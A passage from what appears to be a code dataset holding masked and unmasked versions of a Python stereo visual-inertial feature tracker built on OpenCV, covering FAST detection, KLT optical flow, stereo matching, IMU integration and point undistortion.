intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FeatureMetaData(object):\n <mask token>\n <mask token>\n\n\nclass FeatureMeasurement(object):\n \"\"\"\n Stereo measurement of a feature.\n \"\"\"\n\n def __init__(self):\n self.id = None\n self.u0 = None\n self.v0 = None\n self.u1 = None\n self.v1 = None\n\n\nclass ImageProcessor(object):\n \"\"\"\n Detect and track features in image sequences.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features = self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n\n def load_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\n self.image_id += 1\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
"step-5": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\nfrom itertools import chain, compress\r\nfrom collections import defaultdict, namedtuple\r\n\r\n\r\n\r\nclass FeatureMetaData(object):\r\n \"\"\"\r\n Contain necessary information of a feature for easy access.\r\n \"\"\"\r\n def __init__(self):\r\n self.id = None # int\r\n self.response = None # float\r\n self.lifetime = None # int\r\n self.cam0_point = None # vec2\r\n self.cam1_point = None # vec2\r\n\r\n\r\nclass FeatureMeasurement(object):\r\n \"\"\"\r\n Stereo measurement of a feature.\r\n \"\"\"\r\n def __init__(self):\r\n self.id = None\r\n self.u0 = None\r\n self.v0 = None\r\n self.u1 = None\r\n self.v1 = None\r\n\r\n\r\n\r\nclass ImageProcessor(object):\r\n \"\"\"\r\n Detect and track features in image sequences.\r\n \"\"\"\r\n def __init__(self, config):\r\n self.config = config\r\n\r\n # Indicate if this is the first image message.\r\n self.is_first_img = True\r\n\r\n # ID for the next new feature.\r\n self.next_feature_id = 0\r\n\r\n # Feature detector\r\n self.detector = cv2.FastFeatureDetector_create(self.config.fast_threshold)\r\n\r\n # IMU message buffer.\r\n self.imu_msg_buffer = []\r\n\r\n # Previous and current images\r\n self.cam0_prev_img_msg = None\r\n self.cam0_curr_img_msg = None\r\n self.cam1_curr_img_msg = None\r\n\r\n # Pyramids for previous and current image\r\n self.prev_cam0_pyramid = None\r\n self.curr_cam0_pyramid = None\r\n self.curr_cam1_pyramid = None\r\n\r\n # Features in the previous and current image.\r\n # list of lists of FeatureMetaData\r\n self.prev_features = [[] for _ in range(self.config.grid_num)] # Don't use [[]] * N\r\n self.curr_features = [[] for _ in range(self.config.grid_num)]\r\n\r\n # Number of features after each outlier removal step.\r\n # keys: before_tracking, after_tracking, after_matching, after_ransac\r\n self.num_features = defaultdict(int)\r\n\r\n # load config\r\n # Camera calibration parameters\r\n self.cam0_resolution = config.cam0_resolution # vec2\r\n self.cam0_intrinsics = config.cam0_intrinsics # vec4\r\n self.cam0_distortion_model = config.cam0_distortion_model # string\r\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs # vec4\r\n\r\n self.cam1_resolution = config.cam1_resolution # vec2\r\n self.cam1_intrinsics = config.cam1_intrinsics # vec4\r\n self.cam1_distortion_model = config.cam1_distortion_model # string\r\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs # vec4\r\n\r\n # Take a vector from cam0 frame to the IMU frame.\r\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\r\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\r\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\r\n # Take a vector from cam1 frame to the IMU frame.\r\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\r\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\r\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\r\n\r\n self.image_id = 0\r\n\r\n def stereo_callback(self, stereo_msg):\r\n \"\"\"\r\n Callback function for the stereo images.\r\n \"\"\"\r\n start = time.time()\r\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\r\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\r\n\r\n # Build the image pyramids once since they're used at multiple places.\r\n self.create_image_pyramids()\r\n\r\n # Detect features in the first frame.\r\n if self.is_first_img:\r\n if not self.config.load_features_flag:\r\n self.initialize_first_frame()\r\n self.is_first_img = False\r\n # Draw results.\r\n # self.draw_features_stereo()\r\n else:\r\n if not self.config.load_features_flag:\r\n # Track the feature in the previous image.\r\n t = time.time()\r\n self.track_features()\r\n print('___track_features:', time.time() - t)\r\n t = time.time()\r\n\r\n # Add new features into the current image.\r\n self.add_new_features()\r\n print('___add_new_features:', time.time() - t)\r\n t = time.time()\r\n self.prune_features()\r\n print('___prune_features:', time.time() - t)\r\n t = time.time()\r\n # Draw results.\r\n # self.draw_features_stereo()\r\n print('___draw_features_stereo:', time.time() - t)\r\n t = time.time()\r\n\r\n print('===image process elapsed:', time.time() - start, f'({stereo_msg.timestamp})')\r\n\r\n if not self.config.load_features_flag:\r\n try:\r\n self.save_features() \r\n return self.publish()\r\n finally:\r\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\r\n self.prev_features = self.curr_features\r\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\r\n\r\n # Initialize the current features to empty vectors.\r\n self.curr_features = [[] for _ in range(self.config.grid_num)]\r\n else:\r\n self.load_features()\r\n return self.publish()\r\n\r\n def imu_callback(self, msg):\r\n \"\"\"\r\n Callback function for the imu message.\r\n \"\"\"\r\n self.imu_msg_buffer.append(msg)\r\n\r\n def create_image_pyramids(self):\r\n \"\"\"\r\n Create image pyramids used for KLT tracking.\r\n (Seems doesn't work in python)\r\n \"\"\"\r\n curr_cam0_img = self.cam0_curr_img_msg.image\r\n # self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam0_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam0_pyramid = curr_cam0_img\r\n\r\n curr_cam1_img = self.cam1_curr_img_msg.image\r\n # self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam1_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam1_pyramid = curr_cam1_img\r\n\r\n def initialize_first_frame(self):\r\n \"\"\"\r\n Initialize the image processing sequence, which is basically detect \r\n new features on the first set of stereo images.\r\n \"\"\"\r\n img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(img)\r\n\r\n # Detect new features on the frist image.\r\n new_features = self.detector.detect(img)\r\n\r\n # Find the stereo matched points for the newly detected features.\r\n cam0_points = [kp.pt for kp in new_features]\r\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\r\n\r\n cam0_inliers, cam1_inliers = [], []\r\n response_inliers = []\r\n for i, inlier in enumerate(inlier_markers):\r\n if not inlier:\r\n continue\r\n cam0_inliers.append(cam0_points[i])\r\n cam1_inliers.append(cam1_points[i])\r\n response_inliers.append(new_features[i].response)\r\n # len(cam0_inliers) < max(5, 0.1 * len(new_features))\r\n\r\n # Group the features into grids\r\n grid_new_features = [[] for _ in range(self.config.grid_num)]\r\n\r\n for i in range(len(cam0_inliers)):\r\n cam0_point = cam0_inliers[i]\r\n cam1_point = cam1_inliers[i]\r\n response = response_inliers[i]\r\n\r\n row = int(cam0_point[1] / grid_height)\r\n col = int(cam0_point[0] / grid_width)\r\n code = row*self.config.grid_col + col\r\n\r\n new_feature = FeatureMetaData()\r\n new_feature.response = response\r\n new_feature.cam0_point = cam0_point\r\n new_feature.cam1_point = cam1_point\r\n grid_new_features[code].append(new_feature)\r\n\r\n # Sort the new features in each grid based on its response.\r\n # And collect new features within each grid with high response.\r\n for i, new_features in enumerate(grid_new_features):\r\n for feature in sorted(new_features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_min_feature_num]:\r\n self.curr_features[i].append(feature)\r\n self.curr_features[i][-1].id = self.next_feature_id\r\n self.curr_features[i][-1].lifetime = 1\r\n self.next_feature_id += 1\r\n\r\n def track_features(self):\r\n \"\"\"\r\n Tracker features on the newly received stereo images.\r\n \"\"\"\r\n img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(img)\r\n\r\n # Compute a rough relative rotation which takes a vector \r\n # from the previous frame to the current frame.\r\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\r\n\r\n # Organize the features in the previous image.\r\n prev_ids = []\r\n prev_lifetime = []\r\n prev_cam0_points = []\r\n prev_cam1_points = []\r\n\r\n for feature in chain.from_iterable(self.prev_features):\r\n prev_ids.append(feature.id)\r\n prev_lifetime.append(feature.lifetime)\r\n prev_cam0_points.append(feature.cam0_point)\r\n prev_cam1_points.append(feature.cam1_point)\r\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\r\n\r\n # Number of the features before tracking.\r\n self.num_features['before_tracking'] = len(prev_cam0_points)\r\n\r\n # Abort tracking if there is no features in the previous frame.\r\n if len(prev_cam0_points) == 0:\r\n return\r\n\r\n # Track features using LK optical flow method.\r\n curr_cam0_points = 